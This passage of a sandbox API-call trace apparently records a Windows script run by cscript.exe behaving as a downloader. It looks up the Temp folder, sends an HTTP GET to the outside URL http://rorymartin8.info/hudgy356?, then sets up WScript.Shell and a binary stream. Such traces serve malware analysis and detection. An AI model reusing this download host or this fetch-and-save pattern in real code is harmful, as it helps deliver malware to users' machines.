ppvObject=0xc4685bde38*=0x0) returned 0x80004002 [0021.198] FileSystemObject:IClassFactory:CreateInstance (in: This=0xc46a84b810, pUnkOuter=0x0, riid=0x7ffb25107388*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bde28 | out: ppvObject=0xc4685bde28*=0xc46a84b630) returned 0x0 [0021.198] FileSystemObject:IUnknown:Release (This=0xc46a84b810) returned 0x0 [0021.198] IUnknown:QueryInterface (in: This=0xc46a84b630, riid=0x7ffb25108d78*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0xc4685bdde8 | out: ppvObject=0xc4685bdde8*=0x0) returned 0x80004002 [0021.198] IUnknown:QueryInterface (in: This=0xc46a84b630, riid=0x7ffb25107348*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc4685bddf8 | out: ppvObject=0xc4685bddf8*=0xc46a84b630) returned 0x0 [0021.198] IUnknown:AddRef (This=0xc46a84b630) returned 0x3 [0021.198] IUnknown:Release (This=0xc46a84b630) returned 0x2 [0021.198] IUnknown:Release (This=0xc46a84b630) returned 0x1 [0021.198] IUnknown:QueryInterface (in: This=0xc46a84b630, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bdfc8 | out: ppvObject=0xc4685bdfc8*=0x0) returned 0x80004002 [0021.198] IDispatch:GetIDsOfNames (in: This=0xc46a84b630, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bdf60*="GetSpecialFolder", cNames=0x1, lcid=0x409, rgDispId=0xc4685be114 | out: rgDispId=0xc4685be114*=10014) returned 0x0 [0021.199] IUnknown:AddRef (This=0xc46a84b630) returned 0x2 [0021.199] IUnknown:QueryInterface (in: This=0xc46a84b630, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bde00 | out: ppvObject=0xc4685bde00*=0x0) returned 0x80004002 [0021.199] IDispatch:Invoke (in: This=0xc46a84b630, dispIdMember=10014, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xc4685bdde0*(rgvarg=([0]=0xc4689f9d00*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc4689f0002, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xc4685be038, pExcepInfo=0xc4685bde20, puArgErr=0xc4685bddc0 | out: pDispParams=0xc4685bdde0*(rgvarg=([0]=0xc4689f9d00*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc4689f0002, varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xc4685be038*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a835118, varVal2=0x0), pExcepInfo=0xc4685bde20*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bddc0*=0x688440c0) returned 0x0 [0021.200] IUnknown:Release (This=0xc46a84b630) returned 0x1 [0021.200] IUnknown:QueryInterface (in: This=0xc46a835118, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bde10 | out: ppvObject=0xc4685bde10*=0x0) returned 0x80004002 [0021.200] IUnknown:AddRef (This=0xc46a835118) returned 0x2 [0021.200] IUnknown:QueryInterface (in: This=0xc46a835118, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bdd70 | out: ppvObject=0xc4685bdd70*=0x0) returned 0x80004002 [0021.200] IDispatch:Invoke (in: This=0xc46a835118, dispIdMember=0, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xc4685bdd50*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4685bdf88, pExcepInfo=0xc4685bdd90, puArgErr=0xc4685bdd30 | out: pDispParams=0xc4685bdd50*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4685bdf88*(varType=0x8, wReserved1=0x685b, wReserved2=0xc4, wReserved3=0x0, varVal1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp", varVal2=0xc4689f9d00), pExcepInfo=0xc4685bdd90*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bdd30*=0x685bdde0) returned 0x0 [0021.200] IUnknown:Release (This=0xc46a835118) returned 0x1 [0021.201] AmsiScanString () returned 0x80070015 [0021.202] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685be100 | out: ppvObject=0xc4685be100*=0x0) returned 0x80004002 [0021.202] IDispatch:GetIDsOfNames (in: This=0xc46aa957b0, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685be2e0*="Open", cNames=0x1, lcid=0x7ffb00000409, rgDispId=0xc4685be0a0 | out: rgDispId=0xc4685be0a0*=1) returned 0x0 [0021.203] IUnknown:AddRef (This=0xc46aa957b0) returned 0x2 [0021.203] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bde00 | out: ppvObject=0xc4685bde00*=0x0) returned 0x80004002 [0021.203] IDispatch:Invoke (in: This=0xc46aa957b0, dispIdMember=1, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xc4685bdde0*(rgvarg=([0]=0xc4689f9cd0*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a848698*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a840000, varVal2=0x0), varVal2=0x0), [1]=0xc4689f9ce8*(varType=0x400c, wReserved1=0x689f, wReserved2=0xc4, wReserved3=0x0, varVal1=0xc46a848b40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://rorymartin8.info/hudgy356?", varVal2=0x0), varVal2=0xc4689fc168), [2]=0xc4689f9d00*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a848ae0*(varType=0x8, wReserved1=0x689f, wReserved2=0xc4, wReserved3=0x0, varVal1="GeT", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bde20, puArgErr=0xc4685bddc0 | out: pDispParams=0xc4685bdde0*(rgvarg=([0]=0xc4689f9cd0*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a848698*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a840000, varVal2=0x0), varVal2=0x0), [1]=0xc4689f9ce8*(varType=0x400c, wReserved1=0x689f, wReserved2=0xc4, wReserved3=0x0, varVal1=0xc46a848b40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://rorymartin8.info/hudgy356?", varVal2=0x0), varVal2=0xc4689fc168), [2]=0xc4689f9d00*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a848ae0*(varType=0x8, wReserved1=0x689f, wReserved2=0xc4, wReserved3=0x0, varVal1="GeT", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bde20*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bddc0*=0x689f6360) returned 0x0 [0021.714] IUnknown:Release (This=0xc46aa957b0) returned 0x1 [0021.714] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685be100 | out: ppvObject=0xc4685be100*=0x0) returned 0x80004002 [0021.714] IDispatch:GetIDsOfNames (in: This=0xc46aa957b0, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685be2e0*="Send", cNames=0x1, lcid=0x7ffb00000409, rgDispId=0xc4685be0a0 | out: rgDispId=0xc4685be0a0*=5) returned 0x0 [0021.714] IUnknown:AddRef (This=0xc46aa957b0) returned 0x2 [0021.714] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bde00 | out: ppvObject=0xc4685bde00*=0x0) returned 0x80004002 [0021.714] IDispatch:Invoke (in: This=0xc46aa957b0, dispIdMember=5, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xc4685bdde0*(rgvarg=0xc4689f9d18, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bde20, puArgErr=0xc4685bddc0 | out: pDispParams=0xc4685bdde0*(rgvarg=0xc4689f9d18, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bde20*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bddc0*=0x689f6360) returned 0x0 [0021.795] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0021.795] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bd160 | out: ppvObject=0xc4685bd160*=0xc46a84aa00) returned 0x0 [0021.795] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb2eb49220*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7ffb2eb49220*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xc468847bc8 | out: ppvObject=0xc468847bc8*=0x0) returned 0x80004002 [0021.795] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0021.796] IUnknown:Release (This=0xc46a84aa00) returned 0x1 [0021.796] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0021.796] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bcf10 | out: ppvObject=0xc4685bcf10*=0xc46a84aa00) returned 0x0 [0021.796] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb2eb4a208*(Data1=0xaf0ff408, Data2=0x129d, Data3=0x4b20, Data4=([0]=0x91, [1]=0xf0, [2]=0x2, [3]=0xbd, [4]=0x23, [5]=0xd8, [6]=0x83, [7]=0x52)), riid=0x7ffb2eb4a208*(Data1=0xaf0ff408, Data2=0x129d, Data3=0x4b20, Data4=([0]=0x91, [1]=0xf0, [2]=0x2, [3]=0xbd, [4]=0x23, [5]=0xd8, [6]=0x83, [7]=0x52)), ppvObject=0xc4685bd100 | out: ppvObject=0xc4685bd100*=0x0) returned 0x80004002 [0021.796] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0021.796] IUnknown:Release (This=0xc46a84aa00) returned 0x1 [0022.496] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bbcb0 | out: ppvObject=0xc4685bbcb0*=0xc46a84aa00) returned 0x0 [0022.496] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb2eb48bd8*(Data1=0x79eac9c1, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7ffb2eb4b330*(Data1=0x79eac9c1, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xc4685bbe10 | out: ppvObject=0xc4685bbe10*=0x0) returned 0x80004002 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x1 [0022.496] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bb740 | out: ppvObject=0xc4685bb740*=0xc46a84aa00) returned 0x0 [0022.496] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb2eb4a148*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7ffb2eb4a148*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0xc4685bb940 | out: ppvObject=0xc4685bb940*=0x0) returned 0x80004002 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x1 [0022.496] IUnknown:AddRef (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:QueryInterface (in: This=0xc46a84aa00, riid=0x7ffb23b8e0c0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xc4685bb740 | out: ppvObject=0xc4685bb740*=0xc46a84aa00) returned 0x0 [0022.496] IServiceProvider:QueryService (in: This=0xc46a84aa00, guidService=0x7ffb2eb4a138*(Data1=0x79eac9d5, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7ffb2eb4a138*(Data1=0x79eac9d5, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xc4685bb990 | out: ppvObject=0xc4685bb990*=0x0) returned 0x80004002 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x2 [0022.496] IUnknown:Release (This=0xc46a84aa00) returned 0x1 [0024.760] IUnknown:Release (This=0xc46aa957b0) returned 0x1 [0024.760] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685be188 | out: ppvObject=0xc4685be188*=0x0) returned 0x80004002 [0024.760] IDispatch:GetIDsOfNames (in: This=0xc46aa957b0, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685be2b8*="Status", cNames=0x1, lcid=0x7ffb00000409, rgDispId=0xc4685be09c | out: rgDispId=0xc4685be09c*=7) returned 0x0 [0024.760] IUnknown:AddRef (This=0xc46aa957b0) returned 0x2 [0024.760] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bde00 | out: ppvObject=0xc4685bde00*=0x0) returned 0x80004002 [0024.761] IDispatch:Invoke (in: This=0xc46aa957b0, dispIdMember=7, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0xc4685bdde0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4689f9d00, pExcepInfo=0xc4685bde20, puArgErr=0xc4685bddc0 | out: pDispParams=0xc4685bdde0*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0xc4689f9d00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0xc4685bde20*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bddc0*=0x689f6360) returned 0x0 [0024.761] IUnknown:Release (This=0xc46aa957b0) returned 0x1 [0024.761] GetCurrentThreadId () returned 0xe9c [0024.761] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0xc4685bd6e0 | out: lpclsid=0xc4685bd6e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0024.761] SysStringLen (param_1=0x0) returned 0x0 [0024.761] CoGetClassObject (in: rclsid=0xc4685bd6e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bd6a0 | out: ppv=0xc4685bd6a0*=0xc46a84ac00) returned 0x0 [0024.761] DllGetClassObject (in: rclsid=0xc4687ec6e0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x7ffb25108d58*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bd6a0 | out: ppv=0xc4685bd6a0*=0xc46a84ac00) returned 0x0 [0024.761] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xc4685bd4c0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0024.761] _strcmpi (_Str1="\\CScript.exe", _Str2="\\wscript.exe") returned -20 [0024.761] _strcmpi (_Str1="\\CScript.exe", _Str2="\\cscript.exe") returned 0 [0024.762] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff770f20000 [0024.762] GetProcAddress (hModule=0x7ff770f20000, lpProcName=0x1) returned 0x7ff770f21350 [0024.762] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd7d8 | out: ppvObject=0xc4685bd7d8*=0x0) returned 0x80004002 [0024.762] IDispatch:GetIDsOfNames (in: This=0xc468840f70, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bd770*="Type", cNames=0x1, lcid=0x7ffb00000409, rgDispId=0xc4685bd810 | out: rgDispId=0xc4685bd810*=4) returned 0x0 [0024.763] IUnknown:AddRef (This=0xc468840f70) returned 0x2 [0024.763] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd610 | out: ppvObject=0xc4685bd610*=0x0) returned 0x80004002 [0024.763] IDispatch:Invoke (in: This=0xc468840f70, dispIdMember=4, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x4, pDispParams=0xc4685bd5f0*(rgvarg=([0]=0xc4689f9cb8*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a840001, varVal2=0x0)), rgdispidNamedArgs=([0]=0xc4685bd608*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0xc4685bd630, puArgErr=0xc4685bd5d0 | out: pDispParams=0xc4685bd5f0*(rgvarg=([0]=0xc4689f9cb8*(varType=0x2, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc46a840001, varVal2=0x0)), rgdispidNamedArgs=([0]=0xc4685bd608*=-3), cArgs=0x1, cNamedArgs=0x1), pVarResult=0x0, pExcepInfo=0xc4685bd630*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bd5d0*=0x253b7290) returned 0x0 [0024.763] IUnknown:Release (This=0xc468840f70) returned 0x1 [0024.763] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd970 | out: ppvObject=0xc4685bd970*=0x0) returned 0x80004002 [0024.763] IDispatch:GetIDsOfNames (in: This=0xc468840f70, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0xc4685bdb50*="Open", cNames=0x1, lcid=0x409, rgDispId=0xc4685bd910 | out: rgDispId=0xc4685bd910*=10) returned 0x0 [0024.763] IUnknown:AddRef (This=0xc468840f70) returned 0x2 [0024.763] IUnknown:QueryInterface (in: This=0xc468840f70, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd670 | out: ppvObject=0xc4685bd670*=0x0) returned 0x80004002 [0024.763] IDispatch:Invoke (in: This=0xc468840f70, dispIdMember=10, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0xc4685bd650*(rgvarg=0xc4689f9cb8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd690, puArgErr=0xc4685bd630 | out: pDispParams=0xc4685bd650*(rgvarg=0xc4689f9cb8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0xc4685bd690*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0xc4685bd630*=0x0) returned 0x0 [0024.764] IUnknown:Release (This=0xc468840f70) returned 0x1 [0024.764] ISystemDebugEventFire:IsActive (This=0xc4687edc20) returned 0x1 [0024.764] IUnknown:QueryInterface (in: This=0xc46aa957b0, riid=0x7ffb251073d0*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xc4685bd3a8 | out: ppvObject=0xc4685bd3a8*=0x0) returned 0x80004002 [0024.764] IDispatch:GetIDsOfNames (in: This=0xc46aa957b0, riid=0x7ffb251073c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, 